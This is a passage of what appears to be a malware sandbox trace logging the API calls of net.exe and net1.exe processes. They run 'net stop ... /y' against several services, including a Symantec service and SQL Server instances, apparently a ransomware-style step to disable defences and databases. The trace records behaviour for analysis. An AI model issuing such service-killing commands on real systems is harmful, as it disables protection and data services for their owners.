_wcsicmp (_String1="svr", _String2="NetMsmqActivator") returned 5 [0123.704] _wcsicmp (_String1="srv", _String2="NetMsmqActivator") returned 5 [0123.704] _wcsicmp (_String1="lanmanserver", _String2="NetMsmqActivator") returned -2 [0123.704] _wcsicmp (_String1="alerter", _String2="NetMsmqActivator") returned -13 [0123.704] _wcsicmp (_String1="netlogon", _String2="NetMsmqActivator") returned -1 [0123.705] _wcsupr (in: _String="NetMsmqActivator" | out: _String="NETMSMQACTIVATOR") returned="NETMSMQACTIVATOR" [0123.705] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x425448 [0124.417] GetServiceKeyNameW (in: hSCManager=0x425448, lpDisplayName="NETMSMQACTIVATOR", lpServiceName=0xe5aaf0, lpcchBuffer=0x35fd88 | out: lpServiceName="", lpcchBuffer=0x35fd88) returned 0 [0124.417] _wcsicmp (_String1="msg", _String2="NETMSMQACTIVATOR") returned -1 [0124.417] _wcsicmp (_String1="messenger", _String2="NETMSMQACTIVATOR") returned -1 [0124.417] _wcsicmp (_String1="receiver", _String2="NETMSMQACTIVATOR") returned 4 [0124.417] _wcsicmp (_String1="rcv", _String2="NETMSMQACTIVATOR") returned 4 [0124.417] _wcsicmp (_String1="redirector", _String2="NETMSMQACTIVATOR") returned 4 [0124.417] _wcsicmp (_String1="redir", _String2="NETMSMQACTIVATOR") returned 4 [0124.418] _wcsicmp (_String1="rdr", _String2="NETMSMQACTIVATOR") returned 4 [0124.418] _wcsicmp (_String1="workstation", _String2="NETMSMQACTIVATOR") returned 9 [0124.418] _wcsicmp (_String1="work", _String2="NETMSMQACTIVATOR") returned 9 [0124.418] _wcsicmp (_String1="wksta", _String2="NETMSMQACTIVATOR") returned 9 [0124.418] _wcsicmp (_String1="prdr", _String2="NETMSMQACTIVATOR") returned 2 [0124.418] _wcsicmp (_String1="devrdr", _String2="NETMSMQACTIVATOR") returned -10 [0124.418] _wcsicmp (_String1="lanmanworkstation", _String2="NETMSMQACTIVATOR") returned -2 [0124.418] _wcsicmp (_String1="server", _String2="NETMSMQACTIVATOR") returned 5 [0124.418] _wcsicmp (_String1="svr", _String2="NETMSMQACTIVATOR") returned 5 [0124.418] _wcsicmp (_String1="srv", _String2="NETMSMQACTIVATOR") returned 5 [0124.418] _wcsicmp (_String1="lanmanserver", _String2="NETMSMQACTIVATOR") returned -2 [0124.418] _wcsicmp (_String1="alerter", _String2="NETMSMQACTIVATOR") returned -13 [0124.418] _wcsicmp (_String1="netlogon", _String2="NETMSMQACTIVATOR") returned -1 [0124.418] NetServiceControl (in: servername=0x0, service="NETMSMQACTIVATOR", opcode=0x0, arg=0x0, bufptr=0x35fd84 | out: bufptr=0x35fd84) returned 0x0 [0124.420] NetApiBufferAllocate (in: ByteCount=0xfa0, Buffer=0x35fd60 | out: Buffer=0x35fd60*=0x4276e8) returned 0x0 [0124.420] OpenServiceW (hSCManager=0x425448, lpServiceName="NETMSMQACTIVATOR", dwDesiredAccess=0xc) returned 0x425560 [0124.421] QueryServiceStatus (in: hService=0x425560, lpServiceStatus=0x35fd34 | out: lpServiceStatus=0x35fd34*(dwServiceType=0x20, dwCurrentState=0x1, dwControlsAccepted=0x0, dwWin32ExitCode=0x435, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0124.421] GetServiceDisplayNameW (in: hSCManager=0x425448, lpServiceName="NETMSMQACTIVATOR", lpDisplayName=0xe61fc0, lpcchBuffer=0x35fd18 | out: lpDisplayName="Net.Msmq Listener Adapter", lpcchBuffer=0x35fd18) returned 1 [0124.421] NetApiBufferFree (Buffer=0x4276e8) returned 0x0 [0124.421] CloseServiceHandle (hSCObject=0x425560) returned 1 [0124.422] wcscpy_s (in: _Destination=0xe5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0124.422] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74420000 [0124.423] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74420000, dwMessageId=0xdc1, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="The Net.Msmq Listener Adapter service is not started.\r\n") returned 0x37 [0124.424] GetFileType (hFile=0x0) returned 0x0 [0124.424] LocalAlloc (uFlags=0x0, uBytes=0x6e) returned 0x4260f0 [0124.424] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The Net.Msmq Listener Adapter service is not started.\r\n", cchWideChar=55, lpMultiByteStr=0x4260f0, cbMultiByte=110, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The Net.Msmq Listener Adapter service is not started.\r\n", lpUsedDefaultChar=0x0) returned 55 [0124.424] WriteFile (in: hFile=0x0, lpBuffer=0x4260f0, nNumberOfBytesToWrite=0x37, lpNumberOfBytesWritten=0x35fc88, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x35fc88, lpOverlapped=0x0) returned 0 [0124.424] LocalFree (hMem=0x4260f0) returned 0x0 [0124.424] GetFileType (hFile=0x0) returned 0x0 [0124.424] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4260f0 [0124.424] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4260f0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nB", lpUsedDefaultChar=0x0) returned 2 [0124.424] WriteFile (in: hFile=0x0, lpBuffer=0x4260f0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x35fc88, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x35fc88, lpOverlapped=0x0) returned 0 [0124.424] LocalFree (hMem=0x4260f0) returned 0x0 [0124.424] _ultow (in: _Dest=0xdc1, _Radix=3538104 | out: _Dest=0xdc1) returned="3521" [0124.424] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74420000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 3521.\r\n") returned 0x34 [0124.425] GetFileType (hFile=0x0) returned 0x0 [0124.425] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x4260f0 [0124.425] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 3521.\r\n", cchWideChar=52, lpMultiByteStr=0x4260f0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 3521.\r\n.\r\n", lpUsedDefaultChar=0x0) returned 52 [0124.425] WriteFile (in: hFile=0x0, lpBuffer=0x4260f0, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x35fc94, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x35fc94, lpOverlapped=0x0) returned 0 [0124.425] LocalFree (hMem=0x4260f0) returned 0x0 [0124.425] GetFileType (hFile=0x0) returned 0x0 [0124.425] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4260f0 [0124.425] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4260f0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nB", lpUsedDefaultChar=0x0) returned 2 [0124.425] WriteFile (in: hFile=0x0, lpBuffer=0x4260f0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x35fc94, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x35fc94, lpOverlapped=0x0) returned 0 [0124.425] LocalFree (hMem=0x4260f0) returned 0x0 [0124.425] NetApiBufferFree (Buffer=0x421af8) returned 0x0 [0124.425] NetApiBufferFree (Buffer=0x421b10) returned 0x0 [0124.425] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop NetMsmqActivator /y" [0124.426] exit (_Code=2) Process: id = "272" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5a428000" os_pid = "0xf64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "97" os_parent_pid = "0xfb0" cmd_line = "C:\\Windows\\system32\\net1 stop MsDtsServer100 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 670 os_tid = 0xe9c [0123.743] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f8ec | out: lpSystemTimeAsFileTime=0x16f8ec*(dwLowDateTime=0x1d7f2030, dwHighDateTime=0x1d6f0d1)) [0123.743] GetCurrentProcessId () returned 0xf64 [0123.743] GetCurrentThreadId () returned 0xe9c [0123.743] GetTickCount () returned 0x115230b [0123.743] QueryPerformanceCounter (in: lpPerformanceCount=0x16f8e4 | out: lpPerformanceCount=0x16f8e4*=24284399076) returned 1 [0123.743] GetModuleHandleA (lpModuleName=0x0) returned 0xe40000 [0123.743] __set_app_type (_Type=0x1) [0123.743] __p__fmode () returned 0x770331f4 [0123.744] __p__commode () returned 0x770331fc [0123.744] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe4ffe6) returned 0x0 [0123.744] __getmainargs (in: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068, _DoWildCard=0, _StartInfo=0xe59024 | out: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068) returned 0 [0123.744] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0123.744] GetConsoleOutputCP () returned 0x1b5 [0123.745] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe59080 | out: lpCPInfo=0xe59080) returned 1 [0123.745] SetThreadUILanguage (LangId=0x0) returned 0x409 [0123.748] sprintf_s (in: _DstBuf=0x16f8a4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0123.749] setlocale (category=0, locale=".437") returned="English_United States.437" [0123.751] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3f8 [0123.751] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0123.751] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MsDtsServer100 /y" [0123.751] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x16f670, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0123.751] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x70) returned 0x4e3ae0 [0123.751] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0123.751] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x16f874 | out: Buffer=0x16f874*=0x4e1ae8) returned 0x0 [0123.751] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x16f874 | out: Buffer=0x16f874*=0x4e1b00) returned 0x0 [0123.751] _fileno (_File=0x77032900) returned -2 [0124.433] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0124.433] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0124.433] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0124.433] _wcsicmp (_String1="config", _String2="stop") returned -16 [0124.433] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0124.433] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0124.433] _wcsicmp (_String1="file", _String2="stop") returned -13 [0124.433] _wcsicmp (_String1="files", _String2="stop") returned -13 [0124.433] _wcsicmp (_String1="group", _String2="stop") returned -12 [0124.433] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0124.433] _wcsicmp (_String1="help", _String2="stop") returned -11 [0124.433] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0124.433] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0124.433] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0124.433] _wcsicmp (_String1="session", _String2="stop") returned -15 [0124.433] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0124.433] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0124.433] _wcsicmp (_String1="share", _String2="stop") returned -12 [0124.433] _wcsicmp (_String1="start", _String2="stop") returned -14 [0124.433] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0124.433] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0124.433] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0124.433] _wcsicmp (_String1="accounts", _String2="MsDtsServer100") returned -12 [0124.433] _wcsicmp (_String1="computer", _String2="MsDtsServer100") returned -10 [0124.433] _wcsicmp (_String1="config", _String2="MsDtsServer100") returned -10 [0124.433] _wcsicmp (_String1="continue", _String2="MsDtsServer100") returned -10 [0124.433] _wcsicmp (_String1="cont", _String2="MsDtsServer100") returned -10 [0124.434] _wcsicmp (_String1="file", _String2="MsDtsServer100") returned -7 [0124.434] _wcsicmp (_String1="files", _String2="MsDtsServer100") returned -7 [0124.434] _wcsicmp (_String1="group", _String2="MsDtsServer100") returned -6 [0124.434] _wcsicmp (_String1="groups", _String2="MsDtsServer100") returned -6 [0124.434] _wcsicmp (_String1="help", _String2="MsDtsServer100") returned -5 [0124.434] _wcsicmp (_String1="helpmsg", _String2="MsDtsServer100") returned -5 [0124.434] _wcsicmp (_String1="localgroup", _String2="MsDtsServer100") returned -1 [0124.434] _wcsicmp (_String1="pause", _String2="MsDtsServer100") returned 3 [0124.434] _wcsicmp (_String1="session", _String2="MsDtsServer100") returned 6 [0124.434] _wcsicmp (_String1="sessions", _String2="MsDtsServer100") returned 6 [0124.434] _wcsicmp (_String1="sess", _String2="MsDtsServer100") returned 6 [0124.434] _wcsicmp (_String1="share", _String2="MsDtsServer100") returned 6 [0124.434] _wcsicmp (_String1="start", _String2="MsDtsServer100") returned 6 [0124.434] _wcsicmp (_String1="stats", _String2="MsDtsServer100") returned 6 [0124.434] _wcsicmp (_String1="statistics", _String2="MsDtsServer100") returned 6 [0124.434] _wcsicmp (_String1="stop", _String2="MsDtsServer100") returned 6 [0124.434] _wcsicmp (_String1="time", _String2="MsDtsServer100") returned 7 [0124.434] _wcsicmp (_String1="user", _String2="MsDtsServer100") returned 8 [0124.434] _wcsicmp (_String1="users", _String2="MsDtsServer100") returned 8 [0124.434] _wcsicmp (_String1="msg", _String2="MsDtsServer100") returned 3 [0124.434] _wcsicmp (_String1="messenger", _String2="MsDtsServer100") returned -14 [0124.434] _wcsicmp (_String1="receiver", _String2="MsDtsServer100") returned 5 [0124.434] _wcsicmp (_String1="rcv", _String2="MsDtsServer100") returned 5 [0124.434] _wcsicmp (_String1="netpopup", _String2="MsDtsServer100") returned 1 [0124.434] _wcsicmp (_String1="redirector", _String2="MsDtsServer100") returned 5 [0124.434] _wcsicmp (_String1="redir", _String2="MsDtsServer100") returned 5 [0124.434] _wcsicmp (_String1="rdr", _String2="MsDtsServer100") returned 5 [0124.434] _wcsicmp (_String1="workstation", _String2="MsDtsServer100") returned 10 [0124.434] _wcsicmp (_String1="work", _String2="MsDtsServer100") returned 10 [0124.434] _wcsicmp (_String1="wksta", _String2="MsDtsServer100") returned 10 [0124.434] _wcsicmp (_String1="prdr", _String2="MsDtsServer100") returned 3 [0124.434] _wcsicmp (_String1="devrdr", _String2="MsDtsServer100") returned -9 [0124.434] _wcsicmp (_String1="lanmanworkstation", _String2="MsDtsServer100") returned -1 [0124.434] _wcsicmp (_String1="server", _String2="MsDtsServer100") returned 6 [0124.434] _wcsicmp (_String1="svr", _String2="MsDtsServer100") returned 6 [0124.434] _wcsicmp (_String1="srv", _String2="MsDtsServer100") returned 6 [0124.435] _wcsicmp (_String1="lanmanserver", _String2="MsDtsServer100") returned -1 [0124.435] _wcsicmp (_String1="alerter", _String2="MsDtsServer100") returned -12 [0124.435] _wcsicmp (_String1="netlogon", _String2="MsDtsServer100") returned 1 [0124.435] _wcsupr (in: _String="MsDtsServer100" | out: _String="MSDTSSERVER100") returned="MSDTSSERVER100" [0124.435] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4e54b0 [0124.552] GetServiceKeyNameW (in: hSCManager=0x4e54b0, lpDisplayName="MSDTSSERVER100", lpServiceName=0xe5aaf0, lpcchBuffer=0x16f810 | out: lpServiceName="", lpcchBuffer=0x16f810) returned 0 [0124.553] _wcsicmp (_String1="msg", _String2="MSDTSSERVER100") returned 3 [0124.553] _wcsicmp (_String1="messenger", _String2="MSDTSSERVER100") returned -14 [0124.553] _wcsicmp (_String1="receiver", _String2="MSDTSSERVER100") returned 5 [0124.553] _wcsicmp (_String1="rcv", _String2="MSDTSSERVER100") returned 5 [0124.553] _wcsicmp (_String1="redirector", _String2="MSDTSSERVER100") returned 5 [0124.553] _wcsicmp (_String1="redir", _String2="MSDTSSERVER100") returned 5 [0124.553] _wcsicmp (_String1="rdr", _String2="MSDTSSERVER100") returned 5 [0124.553] _wcsicmp (_String1="workstation", _String2="MSDTSSERVER100") returned 10 [0124.553] _wcsicmp (_String1="work", _String2="MSDTSSERVER100") returned 10 [0124.553] _wcsicmp (_String1="wksta", _String2="MSDTSSERVER100") returned 10 [0124.553] _wcsicmp (_String1="prdr", _String2="MSDTSSERVER100") returned 3 [0124.553] _wcsicmp (_String1="devrdr", _String2="MSDTSSERVER100") returned -9 [0124.553] _wcsicmp (_String1="lanmanworkstation", _String2="MSDTSSERVER100") returned -1 [0124.553] _wcsicmp (_String1="server", _String2="MSDTSSERVER100") returned 6 [0124.553] _wcsicmp (_String1="svr", _String2="MSDTSSERVER100") returned 6 [0124.553] _wcsicmp (_String1="srv", _String2="MSDTSSERVER100") returned 6 [0124.553] _wcsicmp (_String1="lanmanserver", _String2="MSDTSSERVER100") returned -1 [0124.553] _wcsicmp (_String1="alerter", _String2="MSDTSSERVER100") returned -12 [0124.553] _wcsicmp (_String1="netlogon", _String2="MSDTSSERVER100") returned 1 [0124.553] NetServiceControl (in: servername=0x0, service="MSDTSSERVER100", opcode=0x0, arg=0x0, bufptr=0x16f80c | out: bufptr=0x16f80c) returned 0x889 [0124.555] wcscpy_s (in: _Destination=0xe5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0124.555] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74420000 [0124.556] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74420000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0124.557] GetFileType (hFile=0x0) returned 0x0 [0124.557] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x4e3ed0 [0124.557] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x4e3ed0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0124.557] WriteFile (in: hFile=0x0, lpBuffer=0x4e3ed0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x16f74c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f74c, lpOverlapped=0x0) returned 0 [0124.557] LocalFree (hMem=0x4e3ed0) returned 0x0 [0124.557] GetFileType (hFile=0x0) returned 0x0 [0124.557] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4e6178 [0124.557] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4e6178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nN", lpUsedDefaultChar=0x0) returned 2 [0124.557] WriteFile (in: hFile=0x0, lpBuffer=0x4e6178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x16f74c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f74c, lpOverlapped=0x0) returned 0 [0124.557] LocalFree (hMem=0x4e6178) returned 0x0 [0124.557] _ultow (in: _Dest=0x889, _Radix=1505148 | out: _Dest=0x889) returned="2185" [0124.557] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74420000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0124.557] GetFileType (hFile=0x0) returned 0x0 [0124.557] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x4e6178 [0124.558] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x4e6178, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0124.558] WriteFile (in: hFile=0x0, lpBuffer=0x4e6178, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x16f758, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f758, lpOverlapped=0x0) returned 0 [0124.558] LocalFree (hMem=0x4e6178) returned 0x0 [0124.558] GetFileType (hFile=0x0) returned 0x0 [0124.558] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4e6178 [0124.558] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4e6178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nN", lpUsedDefaultChar=0x0) returned 2 [0124.558] WriteFile (in: hFile=0x0, lpBuffer=0x4e6178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x16f758, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f758, lpOverlapped=0x0) returned 0 [0124.558] LocalFree (hMem=0x4e6178) returned 0x0 [0124.558] NetApiBufferFree (Buffer=0x4e1ae8) returned 0x0 [0124.558] NetApiBufferFree (Buffer=0x4e1b00) returned 0x0 [0124.558] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MsDtsServer100 /y" [0124.558] exit (_Code=2) Process: id = "273" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x4e77e000" os_pid = "0xf24" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop SmcService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 671 os_tid = 0xabc Process: id = "274" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5976b000" os_pid = "0xfc8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "135" os_parent_pid = "0xf38" cmd_line = "C:\\Windows\\system32\\net1 stop msftesql$PROD /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 672 os_tid = 0x738 [0125.423] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ff7a4 | out: lpSystemTimeAsFileTime=0x1ff7a4*(dwLowDateTime=0x1e8034b0, dwHighDateTime=0x1d6f0d1)) [0125.423] GetCurrentProcessId () returned 0xfc8 [0125.423] GetCurrentThreadId () returned 0x738 [0125.423] GetTickCount () returned 0x11529a0 [0125.423] QueryPerformanceCounter (in: lpPerformanceCount=0x1ff79c | out: lpPerformanceCount=0x1ff79c*=24452357998) returned 1 [0125.423] GetModuleHandleA (lpModuleName=0x0) returned 0xe40000 [0125.423] __set_app_type (_Type=0x1) [0125.423] __p__fmode () returned 0x770331f4 [0125.423] __p__commode () returned 0x770331fc [0125.423] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe4ffe6) returned 0x0 [0125.423] __getmainargs (in: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068, _DoWildCard=0, _StartInfo=0xe59024 | out: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068) returned 0 [0125.423] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0125.424] GetConsoleOutputCP () returned 0x1b5 [0125.424] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe59080 | out: lpCPInfo=0xe59080) returned 1 [0125.424] SetThreadUILanguage (LangId=0x0) returned 0x409 [0125.427] sprintf_s (in: _DstBuf=0x1ff75c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0125.427] setlocale (category=0, locale=".437") returned="English_United States.437" [0125.429] GetStdHandle (nStdHandle=0xfffffff5) returned 0x448 [0125.429] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0125.429] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop msftesql$PROD /y" [0125.429] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1ff528, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0125.430] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x6e) returned 0x673ae0 [0125.430] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0125.430] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1ff72c | out: Buffer=0x1ff72c*=0x671ae8) returned 0x0 [0125.430] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1ff72c | out: Buffer=0x1ff72c*=0x671b00) returned 0x0 [0125.430] _fileno (_File=0x77032900) returned -2 [0125.430] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0125.430] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0125.430] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0125.430] _wcsicmp (_String1="config", _String2="stop") returned -16 [0125.430] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0125.430] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0125.430] _wcsicmp (_String1="file", _String2="stop") returned -13 [0125.430] _wcsicmp (_String1="files", _String2="stop") returned -13 [0125.431] _wcsicmp (_String1="group", _String2="stop") returned -12 [0125.431] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0125.431] _wcsicmp (_String1="help", _String2="stop") returned -11 [0125.431] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0125.431] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0125.431] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0125.431] _wcsicmp (_String1="session", _String2="stop") returned -15 [0125.431] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0125.431] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0125.431] _wcsicmp (_String1="share", _String2="stop") returned -12 [0125.431] _wcsicmp (_String1="start", _String2="stop") returned -14 [0125.431] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0125.431] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0125.431] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0125.431] _wcsicmp (_String1="accounts", _String2="msftesql$PROD") returned -12 [0125.431] _wcsicmp (_String1="computer", _String2="msftesql$PROD") returned -10 [0125.431] _wcsicmp (_String1="config", _String2="msftesql$PROD") returned -10 [0125.431] _wcsicmp (_String1="continue", _String2="msftesql$PROD") returned -10 [0125.431] _wcsicmp (_String1="cont", _String2="msftesql$PROD") returned -10 [0125.431] _wcsicmp (_String1="file", _String2="msftesql$PROD") returned -7 [0125.431] _wcsicmp (_String1="files", _String2="msftesql$PROD") returned -7 [0125.431] 